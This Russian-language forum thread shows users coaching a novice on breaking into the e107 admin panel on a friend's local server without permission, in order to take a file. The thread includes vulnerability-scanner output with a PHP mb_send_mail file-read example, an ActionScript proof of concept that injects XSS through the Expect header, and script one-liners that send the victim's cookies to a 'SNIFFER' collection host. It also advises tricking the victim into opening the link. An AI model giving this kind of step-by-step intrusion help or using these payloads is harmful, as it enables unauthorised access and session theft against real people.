Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Движок е107, админка
 
Народ есть чувак в локальной сети у него стоит денвер и движок е107. Всё это на виндовс. Помогите получить доступ к админке!!!
Токо не посылайте в гугл.
 
1)
определись с версией e107, если она скрыта, получить информацию о ней можно из шаблонов скинов. затем в путь сюда http://www.google.ru/search?hl=ru&newwindow=1&client=firefox-a&channel=s&rls=org.mozilla%3Aru%3Aofficial&q=e107+exploit&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=

2)
анализировать машину на предмет уязвимостей в ОС и установленных сервисах, тот же Денвер при неграмотной настройке покорен быстрому взлому, не говоря уже о том, что у твоего кента могу быть доступны расшаренные ресурсы, иметься уже годами неудалённые бекдоры и так далее. Я не привык использовать коммерч. сканнеры уязвимостей, поэтому удалённый анализ сетевой активности можно сделать связкой nmap plus nessus.

3)  
зачем тебе это ?)
 
1)да скрыт а как узнать с помощью шаблонов?
2) скоро дам результаты теста Xspidera
3)с пользой для себя ))) взять важный файл
 
1)
По .css стилям (каскадные таблицы стилей), очень часто в них закоментирована версия самой CMS. Плюс анализировать папки, в которых хранятся .js примочки, они содержат аналогичные вещи, так или иначе намекающие на версию.

Цитата
/*
* Please DO NOT USE or reference any of the following class definitions.
* They are not referenced anywhere in the e107 core. (0.700, 7 Feb 2005)
* This file will be eliminated after the remaining definitions (above)
*   have been either verified as unnecessary, or added to all themes.

Если не судьба, то можно воспользоваться следующим. Понять, выполняются ли уязвимости до какой-либо версии, если нет - следовательно версия старше. На примере:

http://www.securitylab.ru/vulnerability/263008.php

Так или иначе можно понять с какой версии вести отсчёт.
Заметь, что если владеешь XSS, можно решить вопрос "впарив" линк с ним твоему товарищу, ибо некоторые версии e107 имеет кроме вышеописанной уязвимости ещё нефильтрующуюся область в теге [color] .

Цитата

2) скоро дам результаты теста Xspidera
3)с пользой для себя ))) взять важный файл

У вас каникулы начались ?)
 
Вообщем версию нашёл 0.7.7. Просконил и получил след результаты:


Переполнение буфера (PHP)
Описание

Краткое описание
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Подробное описание
Уязвимость существует из-за ошибки проверки границ данных в функциях "htmlentities()" и "htmlspecialchars()". Злоумышленник может передать специально сформированные данные PHP приложению, использующему уязвимые функции, вызвать переполнение буфера и выполнить произвольный код на целевой системе.
Уязвимые версии
PHP 5.1.6 и предыдущие
PHP 4.4.4 и предыдущие


Множественные уязвимости (PHP)
Описание

Краткое описание
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение, обойти ограничения безопасности и скомпрометировать систему.
Подробное описание
1. Массив "GLOBALS" является недостаточно защищенным. Удаленный пользователь может переопределить глобальные переменные с помощью "multipart/form-data" POST запроса со специально сформированным полем file upload или посредством сценария, вызывающего функцию "extract()" или "import_request_variables()". Удачная эксплуатация уязвимости требует, чтобы опция register_globals была включена в конфигурационном файле PHP.
2. Обнаружена ошибка при обработке входных данных в функции "parse_str()", когда эта функция вызывается только с одним параметром. Злоумышленник может отключить memory_limit во время обработки входных данных в функции parse_str() путем отправки уязвимой функции большого количества переменных. Функция parse_str(), на время обработки входных данных, включает опцию register_globals, и если во время выполнения функции произойдет отключение memory_limit, то опция register_globals останется включенной до перезагрузки web сервера.
3. Межсайтовый скриптинг возможен при обработке входных данных в функции phpinfo(). Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий на стороне жертвы в контексте безопасности уязвимого сайта.
4. Удаленный пользователь может обойти механизмы безопасности "safe_mode" и "open_basedir" с помощью модулей "ext/curl" и "ext/gd".
5. Неопределенная ошибка при вызове функции virtual() в Apache 2 может быть использована для обхода ограничений безопасности директив "safe_mode" и "open_basedir".
Уязвимые версии
PHP 4.4.0 и предыдущие
PHP 5.0.5 и предыдущие



Межсайтовый скриптинг в поле Expect
Описание

Краткое описание
Уязвимость позволяет удаленному пользователю произвести нападение с помощью межсайтового скриптинга.
Подробное описание
Уязвимость существует из-за недостаточной обработки входных данных в заголовке "Expect:". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
Уязвимые версии
Apache до версии 1.3.35
Apache до версии 2.0.58
Apache до версии 2.2.2
IBM HTTP до версии Server 2.0 + APAR PK25355
IBM HTTP до версии Server 6.0.2.13
IBM HTTP до версии Server 6.1.0.1
Использование уязвимости
Уязвимость может быть использована удалённо путём создания специального запроса к службе веб сервера.
Использование уязвимости удаленно: да
Использование уязвимости локально: да




Переполнение буфера (Apache)
Описание

Краткое описание
Уязвимость в Apache mod_rewrite позволяет удаленному атакующему выполнить произвольный код в системе или вызвать отказ в обслуживании веб-сервиса (DoS-атака).
Подробное описание
Уязвимость существует из-за ошибки в реализации функции "escape_absolute_uri()" модуля mod_rewrite, которая приводит к переполнению буфера (на один байт). Удаленный атакующий с помощью специального запроса (используя LDAP схему запросов) может вызвать отказ в обслуживании или выполнить произвольный код в системе с привилегиями веб-сервиса. Для удачной эксплуатации уязвимости необходимо чтобы правило "RewriteRule" в настройке mod_rewrite не содержало флаги "Forbidden (F)", "Gone (G)" или "NoEscape (NE)".
Уязвимые версии
Apache с версии 1.3.28 по 1.3.36
Apache с версии 2.0.46 по 2.0.58
Apache с версии 2.2.0 по 2.2.2
Использование уязвимости
Использование уязвимости удаленно: да
Использование уязвимости локально: да




Раскрытие информации (PHP)
Описание

Краткое описание
Уязвимость в PHP позволяет злоумышленнику прочитать содержимое определенных участков памяти процесса, которые могут содержать важные данные.
Подробное описание
Уязвимость существует из-за ошибки в реализации функции "html_entity_decode()". Злоумышленник может получить доступ к определенным участкам памяти процесса с помощью php приложения вызывающего функцию "html_entity_decode()". Удачная эксплуатация уязвимости возможна только в том случае, если у злоумышленника есть права на создание php приложения или если на сервере доступно php приложение которое использует эту уязвимую функцию.
Уязвимые версии
PHP 5.1.2 и предыдущие
PHP 5.0.5 и предыдущие
PHP 4.4.2 и предыдущие
PHP 4.3.11 и предыдущие




Обход ограничений безопасности (PHP)
Описание

Краткое описание
Обнаруженные уязвимости в PHP позволяют локальному пользователю обойти ограничения безопасности.
Подробное описание
1. Функция "mb_send_mail()" позволяет передавать дополнительные параметры sendmail с помощью параметра "additional_parameter". Злоумышленник может заставить sendmail прочитать произвольный файл в качестве конфигурационного файла и сохранить результат в произвольную доступную для записи директорию в системе. Злоумышленник так же может обойти ограничения "safe_mode" и "open_basedir" и просмотреть произвольные файлы в системе. Уязвимость существует в версии 5.1.2 и в версиях 4.х.
Пример:
$additional_param = "-C ".$file_to_read." -X ".getcwd()."/".$output_file;
mb_send_mail($email_address, NULL, NULL, NULL, $additional_param);
2. Уязвимость существует в IMAP функциях "imap_open()", "imap_body()" и "imap_list()". Локальный пользователь может обойти ограничения "safe_mode" и "open_basedir" и произвести листинг директорий или просмотреть произвольные файлы в системе. Злоумышленник может также с помощью функций "imap_createmailbox()", "imap_deletemailbox()" и "imap_renamemailbox()" создать, удалить и переименовать файлы в системе с привилегиями Web сервера. Уязвимость существует в PHP 4.4.2 и более ранних версиях, собранных с "c_client 2004g".
Уязвимые версии
PHP 5.1.2 и предыдущие
PHP 4.4.2 и предыдущие

ВОт ещё Результат работы

User-agent: *
Disallow: /e107_admin/
Disallow: /e107_handlers/
Disallow: /e107_files/cache/
Disallow: /e107_files/public/avatars/

И ещё очень много обходов безопасности
 
Уникально.
 
Ну что и как это поможет получить доступ??? Токо пишется по точнее я плохо разбираюсь )
skvoznoy по делу чёнит напиши )
 
Цитата
И ещё очень много обходов безопасности

Ну судя по всему тебе решать какие использовать, если ты, точнее Xspider столько наговорил )

Если уж так любишь сканнеры уязвимостей, советую найти в сети сканнер, профиль которого состоит в обнаружении именно WEB-багов, Acunetix. Возможно он найдёт гораздо больше полезной информации.  

Из отчёта по делу можно воспользоваться XSS уязвимостью.
 
А как её реализовать научи )
 
НУ ТЫ КУДА ДЕЛСЯ КАК РЕАЛИЗОВАТЬ НАЧИТЕ НАРОД ПЛИЗ!!!
 
Лол, уже давно бы сам разобрался.

Проверь http://secunia.com/expect_header_cross-site_scripting_vulnerability_test/ на предмет реального содержания уязвимости, она чекает именно на метод expect.

Простейший пример - с помощью Action Script будем передавать специальные параметры, :

Специально для тебя переписал первый POC на эту тему от SecuriTeam, афишированный Amit Klein до 3 строк:

Цитата
var Get:LoadVars = new LoadVars();
Get.addRequestHeader("Expect","<script>alert(document.cookie)</script>");
Get.send("http://ресурс/","_self","POST");  

Осталось сделать из этого нормальный .sfw документ, у меня лично Flash CS3 - я просто делаю экспорт в .swf и выгружаю на хост. К слову, если ты его не юзаешь, можешь воспользоваться MTASC.  Впариваем, естественно вид XSS другой - привычный с адрессацией на сниффер. Ясное дело, что модифицируешь XSS ты сам, так как научился пользоваться Xspider и явно поймёшь, тем более принцип я указал )

Самые простые конструкции XSS:

Код
<script>document.location="SNIFFER"+document.cookie</script>
<script>img=new Image();img.src="SNIFFER"+document.cookie</script> 


По поводу Sniffer - php sniffer'ов в сети уйма, найди статью "Немного об XSS" - там приведены примеры.
 
Про первый ваще не фига не понил. Куда что когда куда это всё писать что с этим делать )
Про 2 ясней <script>document.location="SNIFFER"+document.cookie</script>
<script>img=new Image();img.src="SNIFFER"+document.cookie</script>
Куда это пихать? ) А SNIFFER путь к сниферу?
 
Цитата
Про первый ваще не фига не понил. Куда что когда куда это всё писать что с этим делать )

Я тебе по русски написал -готовится отдельно Action Script код, с помощью MTASC компилится .swf документ, который может быть загружен на любой хост как вредоносный (содержащий XSS, ворующий куки на сниффер).

Цитата
Про 2 ясней <script>document.location="SNIFFER"+document.cooki­e</script>
<script>img=new Image();img.src="SNIFFER"+document.cookie</script>­
Куда это пихать? )

Ясней? ) Для начала бы хорошо прояснить собственные знания на тему общего кросс-сайтового скриптинга, вариации которого подставляются сюда:

Код
Get.addRequestHeader("Expect","СЮДА"); 


Цитата
А SNIFFER путь к сниферу?

Да.
 
Про первый: и чё вставлять в http://ресурс/ путь к сниферу?
 var Get:LoadVars = new LoadVars();
Get.addRequestHeader("Expect","<script>alert(document.cookie)</script>");
Get.send("http://ресурс/","_self","POST"); И как мне потом эти куки расшифровать ? или как? Ещё вопрос если админ зайдёт на эту страницу куки своруется или токо когда он нажмёт на этот файл?

Про 2 можно забыть )
Страницы: 1
Читают тему